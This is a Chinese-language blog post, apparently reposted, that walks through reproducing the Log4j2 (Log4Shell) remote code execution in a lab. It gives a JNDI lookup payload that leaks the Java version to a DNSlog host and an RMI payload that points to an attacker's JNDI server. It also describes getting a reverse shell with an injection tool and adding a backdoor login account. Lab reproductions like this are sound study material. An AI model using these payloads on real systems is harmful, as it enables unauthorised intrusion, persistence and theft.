Log4j2 RCE 复现

0x01 前言
由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。
0x02 环境搭建
如图下载进行搭建即可,搭建就不细说了可直接访问度娘即可
图片[1]-Log4j2 RCE 复现-安全小天地
图 2-1 部署文件
0x03 漏洞复现
访问漏洞url:http://192.168.1.17:8080/
图片[2]-Log4j2 RCE 复现-安全小天地
图 3-1 Log4j2 靶场
访问靶场之后在其登录框传参输入payload:${jndi:ldap://${sys:java.version}.0bcjz2.dnslog.cn/}
此payload 是获取java版本如果Dnslog成功接收即代表漏洞存在
Dnslog成功接收
图片[3]-Log4j2 RCE 复现-安全小天地
图 3-2 Dnslog
Dnslog接收后尝试使用JNDI注入工具进行反弹shell
发现Dnslog成果接收后,我们可以在自己服务器或者本地起JNDI的服务,然后输入攻击payload:${jndi:rmi://10.198.198.215:1099/uenrdi}
图片[4]-Log4j2 RCE 复现-安全小天地
图 3-3 Jndi注入工具
工具参数详解: -C 需要执行的命令 -A 自己需要反弹shell的服务器主机IP
图片[5]-Log4j2 RCE 复现-安全小天地
图片[6]-Log4j2 RCE 复现-安全小天地
图 3-4 3-5 反弹shell 添加用户
通过上图得知执行了攻击payload后成功拿到shell,接着就是添加用户进行远程登录
添加用户账号:admin/Admin@123../
图片[7]-Log4j2 RCE 复现-安全小天地
图 3-6 Linux操作终端
0x04 结束语
支持Log4j2 漏洞复现完结,如想需要工具的师傅或者有啥建议的师傅,可在评论区留言,感谢各位师傅观看!!!

文字来源于- 火线 Zone-云安全社区,安全小天地只做文章分享,如有侵权,请联系站长删除


「渗透云记」公众号里主要记录我每天的所思所想,我会坚持更新质量不错的文章,感兴趣的小伙伴可以扫描下方二维码,谢谢支持! 安全小天地 - 公众号 - 渗透云记
© 版权声明
THE END
喜欢就支持一下吧
点赞5 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容